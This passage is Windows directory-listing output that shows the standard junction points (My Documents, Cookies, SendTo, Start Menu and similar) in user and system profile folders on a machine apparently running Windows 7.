0 File(s) 0 bytes

Directory of C:\Users\Nick\Documents

03/30/2010 19:19 <JUNCTION> My Music [C:\Users\Nick\Music]

03/30/2010 19:19 <JUNCTION> My Pictures [C:\Users\Nick\Pictures]

03/30/2010 19:19 <JUNCTION> My Videos [C:\Users\Nick\Videos]

0 File(s) 0 bytes

Directory of C:\Users\Owner

03/29/2010 18:48 <JUNCTION> Application Data [C:\Users\Owner\AppData\Roaming]

03/29/2010 18:48 <JUNCTION> Cookies [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Cookies]

03/29/2010 18:48 <JUNCTION> Local Settings [C:\Users\Owner\AppData\Local]

03/29/2010 18:48 <JUNCTION> My Documents [C:\Users\Owner\Documents]

03/29/2010 18:48 <JUNCTION> NetHood [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Network Shortcuts]

03/29/2010 18:48 <JUNCTION> PrintHood [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]

03/29/2010 18:48 <JUNCTION> Recent [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Recent]

03/29/2010 18:48 <JUNCTION> SendTo [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo]

03/29/2010 18:48 <JUNCTION> Start Menu [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu]

03/29/2010 18:48 <JUNCTION> Templates [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Users\Owner\AppData\Local

03/29/2010 18:48 <JUNCTION> Application Data [C:\Users\Owner\AppData\Local]

03/29/2010 18:48 <JUNCTION> History [C:\Users\Owner\AppData\Local\Microsoft\Windows\History]

03/29/2010 18:48 <JUNCTION> Temporary Internet Files [C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files]

0 File(s) 0 bytes

Directory of C:\Users\Owner\Documents

03/29/2010 18:48 <JUNCTION> My Music [C:\Users\Owner\Music]

03/29/2010 18:48 <JUNCTION> My Pictures [C:\Users\Owner\Pictures]

03/29/2010 18:48 <JUNCTION> My Videos [C:\Users\Owner\Videos]

0 File(s) 0 bytes

Directory of C:\Users\Public\Documents

07/14/2009 00:08 <JUNCTION> My Music [C:\Users\Public\Music]

07/14/2009 00:08 <JUNCTION> My Pictures [C:\Users\Public\Pictures]

07/14/2009 00:08 <JUNCTION> My Videos [C:\Users\Public\Videos]

0 File(s) 0 bytes

Directory of C:\Windows\System32\config\systemprofile

04/03/2010 23:53 <JUNCTION> Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]

04/03/2010 23:53 <JUNCTION> Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]

01/03/2012 02:48 <JUNCTION> My Documents [C:\Windows\system32\config\systemprofile\Documents]

01/03/2012 02:48 <JUNCTION> NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]

01/03/2012 02:48 <JUNCTION> PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]

01/03/2012 02:48 <JUNCTION> Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]

01/03/2012 02:48 <JUNCTION> SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]

10/02/2010 12:06 <JUNCTION> Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]

01/03/2012 02:48 <JUNCTION> Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]

0 File(s) 0 bytes

Directory of C:\Windows\System32\config\systemprofile\AppData\Local

04/03/2010 23:53 <JUNCTION> Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]

04/03/2010 23:53 <JUNCTION> History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]

04/03/2010 23:53 <JUNCTION> Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]

0 File(s) 0 bytes

Directory of C:\Windows\System32\config\systemprofile\Documents

01/03/2012 02:48 <JUNCTION> My Music [C:\Windows\system32\config\systemprofile\Music]

01/03/2012 02:48 <JUNCTION> My Pictures [C:\Windows\system32\config\systemprofile\Pictures]

01/03/2012 02:48 <JUNCTION> My Videos [C:\Windows\system32\config\systemprofile\Videos]

0 File(s) 0 bytes

Directory of C:\Windows\SysWOW64\config\systemprofile